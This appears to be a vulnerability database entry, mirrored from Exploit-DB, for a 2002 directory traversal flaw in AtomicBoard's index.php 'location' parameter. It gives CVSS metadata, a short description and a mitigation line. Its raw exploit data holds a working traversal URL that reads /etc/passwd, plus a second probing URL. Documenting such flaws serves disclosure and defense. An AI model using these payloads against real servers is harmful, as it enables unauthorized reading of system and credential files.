header-logo
Suggest Exploit
vendor:
AtomicBoard
by:
SecurityFocus
7.5
CVSS
HIGH
Directory Traversal
22
CWE
Product Name: AtomicBoard
Affected Version From: 2000.6.2
Affected Version To: 2000.6.2
Patch Exists: NO
Related CWE: N/A
CPE: a:atomic_board:atomicboard
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2002

AtomicBoard Directory Traversal Vulnerability

It has been reported that attackers may be able to modify the 'location' variable passed to the index.php file to cause the Web server to return arbitrary files. This script is prone to a directory traversal vulnerability, allowing attackers to retrieve any file residing on the filesystem readable by the Web server user.

Mitigation:

Ensure that user input is properly sanitized and validated before being used in file operations.
Source

Exploit-DB raw data:

source: https://www.securityfocus.com/bid/8236/info

It has been reported that attackers may be able to modify the 'location' variable passed to the index.php file to cause the Web server to return arbitrary files. This script is prone to a directory traversal vulnerability, allowing attackers to retrieve any file residing on the filesystem readable by the Web server user.

http://www.example.com/atomicboard/index.php?location=../../../../../../etc/passwd

http://www.example.com/AtomicBoard-0.6.2/index.php?location=anything

Navigation

Suggest Exploit

Services By CQR